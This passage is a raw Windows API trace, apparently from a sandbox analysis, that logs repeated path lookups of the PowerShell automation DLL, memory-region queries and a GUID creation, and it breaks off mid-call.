0x74 [0091.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.339] VirtualQuery (in: lpAddress=0x16c070, lpBuffer=0x16cf30, dwLength=0x30 | out: lpBuffer=0x16cf30*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.344] VirtualQuery (in: lpAddress=0x16c070, lpBuffer=0x16cf30, dwLength=0x30 | out: lpBuffer=0x16cf30*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.349] VirtualQuery (in: lpAddress=0x16c070, lpBuffer=0x16cf30, dwLength=0x30 | out: lpBuffer=0x16cf30*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.351] VirtualQuery (in: lpAddress=0x16c070, lpBuffer=0x16cf30, dwLength=0x30 | out: lpBuffer=0x16cf30*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.354] VirtualQuery (in: lpAddress=0x16b760, lpBuffer=0x16c620, dwLength=0x30 | out: lpBuffer=0x16c620*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.355] VirtualQuery (in: lpAddress=0x16b7f0, lpBuffer=0x16c6b0, dwLength=0x30 | out: lpBuffer=0x16c6b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.357] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.357] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.360] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.361] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.361] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.362] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.362] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.363] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.363] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.364] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.366] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.367] VirtualQuery (in: lpAddress=0x16bba0, lpBuffer=0x16ca60, dwLength=0x30 | out: lpBuffer=0x16ca60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.368] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.369] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.369] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.496] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0091.497] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc1e74331, Data2=0x8923, Data3=0x4176, Data4=([0]=0xbb, [1]=0x7, [2]=0x66, [3]=0x3b, [4]=0x44, [5]=0x46, [6]=0x1e, [7]=0xda))) returned 0x0 [0091.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, 